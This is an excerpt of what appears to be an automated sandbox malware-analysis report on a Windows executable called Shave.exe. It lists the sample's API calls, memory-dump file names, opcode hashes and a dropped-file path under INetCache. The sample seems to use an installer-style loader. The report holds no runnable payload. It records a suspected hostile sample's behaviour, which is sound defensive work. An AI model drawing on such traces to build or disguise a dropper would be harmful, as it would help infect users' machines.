                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FilePointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 973152223-0
                                                                                                                                • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                • Opcode ID: 4484e40c8847390ad24901e1c64382b1b039e93175f5d76bb293bea36d4a14a5
                                                                                                                                • Instruction ID: a51ecd0892fb275ea92473d319bbbc5ec4fc6164fb370921ec18ec876cc9dfbc
                                                                                                                                • Opcode Fuzzy Hash: 4484e40c8847390ad24901e1c64382b1b039e93175f5d76bb293bea36d4a14a5
                                                                                                                                • Instruction Fuzzy Hash: A6D05E73E142008BD750DBB8BA8945E73A8F781319320C83BE102F1191E97888524A2D
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                                                                                • GetClientRect.USER32(?,?), ref: 004054E8
                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                                                                                                                  • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405613
                                                                                                                                • ShowWindow.USER32(00000000), ref: 00405637
                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040563C
                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405686
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                                                                                                                • CreatePopupMenu.USER32 ref: 004056CB
                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004056FF
                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405760
                                                                                                                                • EmptyClipboard.USER32 ref: 00405766
                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                                                                                                                • CloseClipboard.USER32 ref: 004057C1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                • String ID: {
                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                • Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                                                                                • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                                                                                                                • Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                                                                                • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                                                                                • lstrcmpiW.KERNEL32(Call,007A1F20,00000000,?,?), ref: 00404866
                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404872
                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                                                                                  • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                                                                                  • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shave.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                  • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                  • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shave.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                  • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shave.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                                                                                  • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                  • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                                                                                  • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$Call
                                                                                                                                • API String ID: 2624150263-2515044598
                                                                                                                                • Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                                                                                • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                                                                                • Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                                                                                • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                                                                                APIs
                                                                                                                                • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne, xrefs: 004021C3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInstance
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne
                                                                                                                                • API String ID: 542301482-613682384
                                                                                                                                • Opcode ID: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
                                                                                                                                • Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
                                                                                                                                • Opcode Fuzzy Hash: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
                                                                                                                                • Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                • Opcode ID: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
                                                                                                                                • Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
                                                                                                                                • Opcode Fuzzy Hash: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
                                                                                                                                • Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A
                                                                                                                                APIs
                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
                                                                                                                                • GetSysColor.USER32(?), ref: 004044AD
                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404550
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                                                                                • SetCursor.USER32(00000000), ref: 004045CF
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                                                                                • SetCursor.USER32(00000000), ref: 004045EB
                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                • String ID: Call$DC@$N
                                                                                                                                • API String ID: 3103080414-3199507676
                                                                                                                                • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                                                                                • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                                                                                APIs
                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                • String ID: F
                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                                                                                • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                                                                                APIs
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                                                                                • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                                                                                  • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                                                                  • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                                                                • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                                                                                • wsprintfA.USER32 ref: 00405F62
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
